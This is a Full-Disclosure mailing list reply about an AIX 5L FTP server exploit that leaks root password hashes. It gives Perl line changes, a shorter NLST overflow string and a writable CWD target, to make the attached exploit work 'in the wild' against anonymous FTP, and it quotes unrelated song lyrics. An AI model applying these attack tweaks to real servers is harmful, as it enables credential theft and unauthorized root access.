Re: --== ~ AIX5l w/ FTP-SERVER REMOTE ROOT HASH DISCLOSURE EXPLOIT ~ =--

["HI-TECH ." <isowarez.isowarez.isowarez () googlemail com>]

Hello list.

Just checked: If the exploit doesn't work in the wild, try playing with the
source..

change
print $sock "NLST ~" . "A" x 5000 . "\r\n";
to
print $sock "NLST ~" . "A" x 2000 . "\r\n";

and change

print $sock "CWD pub\r\n";
to
print $sock "CWD writeable-folder-here\r\n";
for anonymous ftp attacks.

Cheers!

Kingcope

2010/7/18 HI-TECH . <isowarez.isowarez.isowarez () googlemail com>

> (SEE ATTACHMENT)
>
> ---
>
> Bad luck wind been blowin' on my back
> I was born to bring trouble wherever I'm at
> With the number '13' tattooed on my neck
> That ink starts to itch
> Black gon' turn to red
>
> I was born in the soul of misery
> And I never had me a name
> They just give me a number when I was young
>
> Got a long line of heartache
> I carry it well
> The list of lives I've broken
> Reach from here to hell
> And a bad luck wind been blowin' on my back
> Pray you don't look at me
> And I pray I don't look back
>
> I was born in the soul of misery
> And I never had me a name
> They just give me a number when I was young
>
> Found me with a preacherman confessin' all I done
> Catch me with the devil playing 21
> And a bad luck wind been blowin' on my back
> I was born to bring trouble wherever I'm at
>
> I was born in the soul of misery
> And I never had me a name
> They just give me a number when I was young
> When I was young
> When I was young
> When I was young
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/